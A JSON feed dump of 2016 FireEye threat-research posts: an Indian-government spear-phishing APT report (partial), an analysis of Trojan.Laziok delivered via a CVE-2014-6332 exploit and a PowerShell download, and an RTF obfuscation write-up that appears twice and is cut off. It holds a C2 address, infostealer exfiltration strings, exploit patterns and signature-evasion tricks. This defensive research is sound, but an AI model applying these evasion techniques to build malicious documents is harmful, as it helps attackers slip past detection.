Update\u201d which points to the above dropped payload.\n\n4\\. The malware proceeds to connect to the C2 server at 5.189.145.248 at regular intervals through the use of TCP over port 10500. Once a successful connection is made, the malware tries to fetch a response from the server through its custom protocol.\n\n5\\. Once data is received, the malware skips over the received bytes until the start byte 0x99 is found in the server response. The start byte is followed by a DWORD representing the size of the following data string.\n\n6\\. The data string is encrypted with the above-mentioned encryption scheme with the hard-coded key \u201cAjN28AcMaNX\u201d.\n\n7\\. The data string can contain various commands sent by the C2 server. These commands and their string arguments are expected to be in Unicode. The following commands are accepted by the malware:\n\n\n\n**Conclusion** \nAs with previous spear-phishing attacks seen conducted by this group, topics related to Indian Government and Military Affairs are still being used as the lure theme in these attacks and we observed that this group is still actively expanding their toolkit. It comes as no surprise that cyber attacks against the Indian government continue, given the historically tense relations in the region.\n\n**Appendix**\n\n****Encryption / Decryption algorithm translated into Python****\n\n\n", "modified": "2016-06-03T01:30:00", "published": "2016-06-03T01:30:00", "href": "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", "id": "FIREEYE:3A68F8390FB41E5497C5AA3B9BEBA5A6", "type": "fireeye", "title": "APT Group Sends Spear Phishing Emails to Indian Government Officials", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:19", "bulletinFamily": "info", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into \u201dGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<mailto:https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36]\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "modified": "2016-04-21T13:45:00", "published": "2016-04-21T13:45:00", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "id": "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "title": "How RTF malware evades static signature-based detection", "type": "fireeye", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:05", "bulletinFamily": "info", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 